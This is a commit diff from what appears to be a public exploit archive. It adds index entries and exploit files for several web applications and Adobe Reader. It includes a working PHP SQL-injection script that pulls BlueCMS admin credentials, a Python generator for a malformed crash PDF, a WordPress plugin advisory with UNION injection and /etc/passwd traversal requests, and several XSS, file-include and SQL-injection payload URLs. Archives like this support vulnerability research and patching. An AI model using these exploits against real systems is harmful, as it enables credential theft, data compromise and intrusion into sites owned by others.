Updated 09_12_2014

2014-09-12 04:45:04 +00:00 · 2014-09-12 04:45:04 +00:00 · ad75a1324d
commit ad75a1324d
parent afeaf30889
11 changed files with 323 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31147,6 +31147,7 @@ id,file,description,date,author,platform,type,port
 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
 34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
@ -31157,3 +31158,12 @@ id,file,description,date,author,platform,type,port
 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
 34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 'acroform_PlugInMain' Memory Corruption Vulnerability",2010-09-06,ITSecTeam,windows,dos,0
 34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 'X-Forwarded-For' Header SQL Injection Vulnerability",2010-09-06,cnryan,php,webapps,0
 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager `index.php' Cross Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
 34609,platforms/php/webapps/34609.txt,"MySource Matrix 'char_map.php' Multiple Cross Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
--- a/platforms/php/webapps/34589.txt
+++ b/platforms/php/webapps/34589.txt
@ -0,0 +1,52 @@
 # Exploit Title: Wordpress WP Support Plus Responsive Ticket System 2.0
 Plugin - Multiple Vulnerabilities
 # Google Dork: N/A
 # Date: 09.09.2014
 # Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
 # Vendor Homepage - http://wpsuportplus.byethost7.com/
 # Software
 http://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
 # Version: 2.0
 # Tested on: PHP
 Description:
 This plugin adds to WordPress the features of a complete ticket system with
 100% responsive and 100% Ajax functionality. This allows users to submit
 tickets to report problems or get support on whatever you want. Users can
 set the status, priority and category of each ticket.
 Proof of Concept:
 1. SQL INJECTION
 URL     : http://localhost/wp-admin/admin-ajax.php
 METHOD  : POST
 REQUEST : action=openTicket&ticket_id=-1 UNION SELECT
 concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7
 * any registered user can successfully execute this request
 2. FULL PATH DISCLOSURE
 a) URL :
 http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/var/www/wp-content/uploads/2014/09/file.pdf
 * full path to the file will be shown to the user after the file has been
 uploaded
 b) URL :
 http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=
 * full path will be shown in PHP error message if parameter "path" is empty
 3. DIRECTORY TRAVERSAL
 URL :
 http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/etc/passwd
 * any file from the server can be downloaded by giving parameter "path" the
 location to the file
 4. BROKEN AUTHENTICATION
 URL :
 http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=<any
 file path>
 * The script "downloadAttachment.php" is accessible for anyone without
 having to login.
--- a/platforms/php/webapps/34604.php
+++ b/platforms/php/webapps/34604.php
@ -0,0 +1,90 @@
 source: http://www.securityfocus.com/bid/42999/info
 BlueCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 <?php
 print_r('
 +---------------------------------------------------------------------------+
 BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
 by cnryan
 Mail: cnryan2008[at]gmail[dot]com
 Blog: http://hi.baidu.com/cnryan     
            W . S . T                        
 +---------------------------------------------------------------------------+
 ');
 if ($argc < 3) {
    print_r('
 +---------------------------------------------------------------------------+
 Example:
 php '.$argv[0].' localhost /bluecms/
 +---------------------------------------------------------------------------+
 ');
    exit;
 }
 error_reporting(7);
 ini_set('max_execution_time', 0);
 $host = $argv[1];
 $path = $argv[2];
 send();
 send2();
 function send()
 {
    global $host, $path;
    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";
    $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";
    $data = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
 }
 function send2()
 {
 global $host, $path;
 $message="GET ".$path."news.php?id=1 HTTP/1.1\r\n";
 $message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";
 $message.="Accept-Language: zh-cn\r\n";
 $message.="Accept-Encoding: gzip, deflate\r\n";
 $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";
 $message.="Host: $host\r\n";
 $message.="Connection: Keep-Alive\r\n\r\n";
 $fd = fsockopen($host,'80');
 if(!$fd)
 {
    echo '[-]No response from'.$host;
    die;
 }
 fputs($fd,$message);
 $resp = '';
 while (!feof($fd)) {
    $resp.=fgets($fd);
 }
 fclose($fd);
 preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db);
 if($db[1][0]&$db[2][0])
 {
 echo "username->".$db[1][0]."\r\n";
 echo "password->".$db[2][0]."\r\n";
 echo "[+]congratulation ^ ^";
 }else die('[-]exploited fail >"<');
 }
 ?>
--- a/platforms/php/webapps/34605.txt
+++ b/platforms/php/webapps/34605.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/43001/info
 Horde Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 This issue affects versions prior to and including Horde 3.3.8.
 Note that additional products that use the Horde framework may also be vulnerable. 
 http://www.example.com/util/icon_browser.php?subdir=[xss]&app=horde 
--- a/platforms/php/webapps/34606.txt
+++ b/platforms/php/webapps/34606.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43003/info
 Webformatique Reservation Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Webformatique Reservation Manager 2.4.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/index.php?resman_startdate=[XSS] 
--- a/platforms/php/webapps/34607.txt
+++ b/platforms/php/webapps/34607.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43004/info
 TBDev is prone to multiple input-validation vulnerabilities, including a remote file-include issue and an SQL-injection issue.
 A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 TBDev 2.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/admincp.php?rootpath=(rfi) 
--- a/platforms/php/webapps/34608.txt
+++ b/platforms/php/webapps/34608.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43006/info
 HeffnerCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
 HeffnerCMS 1.22 is vulnerable; other versions may also be affected.
 http://www.example.com/index.php?page=lang/interface_en.lng%00 
--- a/platforms/php/webapps/34609.txt
+++ b/platforms/php/webapps/34609.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43020/info
 MySource Matrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 The issue affects MySource Matrix 3.28.3; other versions may also be affected.
 http://www.example.com/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E 
--- a/platforms/php/webapps/34610.txt
+++ b/platforms/php/webapps/34610.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43021/info
 Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Zenphoto 1.3 is vulnerable; other versions may also be affected.
 /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75
--- a/platforms/php/webapps/34611.txt
+++ b/platforms/php/webapps/34611.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/43021/info
 Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Zenphoto 1.3 is vulnerable; other versions may also be affected.
 /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22
--- a/platforms/windows/dos/34603.py
+++ b/platforms/windows/dos/34603.py
@ -0,0 +1,106 @@
 source: http://www.securityfocus.com/bid/42998/info
 Adobe Acrobat and Reader are prone to a remote memory-corruption vulnerability.
 Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions. 
 #!user/bin/python
 _doc_ = '''
 -------------------------------------------------------------------------
 title : adobe acrobat reader acroform_PlugInMain memory corruption
 Product: Adobe Acrobat Reader
 Version: 7.x, 8.x, 9.x
 Tested : 8.1 - 9.1 - 9.2 - 9.3.3 - 9.3.4
 Product Homepage: www.adobe.com
 Tested Os : Windows XP SP1/SP3 EN 
            Windows Seven
 AUTHOR  : ITSecTeam
 Email   : Bug@ITSecTeam.com
 Website : http://www.itsecteam.com
 Forum   : http://forum.ITSecTeam.com
 --------------------------------------------------------------------------
 '''
 import sys
 def main():
 	buffer = "%PDF-1.7"
 	buffer += "\n1 0 obj\n"
 	buffer += "<<\n"
 	buffer += "/Kids [2 0 R]\n"
 	buffer += "/Count 1\n"
 	buffer += "/Type /Pages\n"
 	buffer += ">>\n"
 	buffer += "endobj\n"
 	buffer += "2 0 obj\n"
 	buffer += "<<\n"
 	buffer += "/Group\n"
 	buffer += "<<\n"
 	buffer += ">>\n"
 	buffer += "/Parent 1 0 R\n"
 	buffer += "/Annots [3 0 R ]\n"
 	buffer += ">>\n"
 	buffer += "endobj\n"
 	buffer += "3 0 obj\n"
 	buffer += "<<\n"
 	buffer += "/Subtype /Widget\n"
 	buffer += "/Rect []\n"
 	buffer += "/FT /Btn\n"
 	buffer += ">>\n"
 	buffer += "endobj\n"
 	buffer += "4 0 obj\n"
 	buffer += "<<\n"
 	buffer += "/Names\n"
 	buffer += "<<\n"
 	buffer += ">>\n"
 	buffer += "/Pages 1 0 R\n"
 	buffer += "/OCProperties\n"
 	buffer += "<<\n"
 	buffer += "/D\n"
 	buffer += "<<\n"
 	buffer += ">>\n"
 	buffer += ">>\n"
 	buffer += "/AcroForm\n" 
 	buffer += "<<\n"
 	buffer += "/NeedAppearances true\n"
 	buffer += "/DR\n"
 	buffer += "<<\n"
 	buffer += "/Font\n" 
 	buffer += "<<\n"
 	buffer += ">>\n"
 	buffer += ">>\n"
 	buffer += ">>\n"
 	buffer += "/ViewerPreferences\n"
 	buffer += "<<\n"
 	buffer += ">>\n"
 	buffer += ">>\n"
 	buffer += "endobj xref\n"
 	buffer += "0000000000 65535 f\n" 
 	buffer += "0000000015 00000 n\n"
 	buffer += "0000000074 00000 n\n"
 	buffer += "0000000199 00000 n\n"
 	buffer += "0000000280 00000 n\n"
 	buffer += "trailer\n"
 	buffer += "<<\n"
 	buffer += "/Root 4 0 R\n"
 	buffer += "/Size 5\n"
 	buffer += ">>\n"
 	buffer += "startxref\n"
 	buffer += "449\n"
 	buffer += "%%EOF\n"
 	try:
 		print "[+] Creating POC file.."
 		exploit = open('crash.pdf','w');
 		exploit.write(buffer);
 		exploit.close();
 		print "[+] POC file created!"
 	except:
 		print "[-] Error: try again"
 		sys.exit(0)
 if __name__=="__main__":
 	print _doc_
 	main()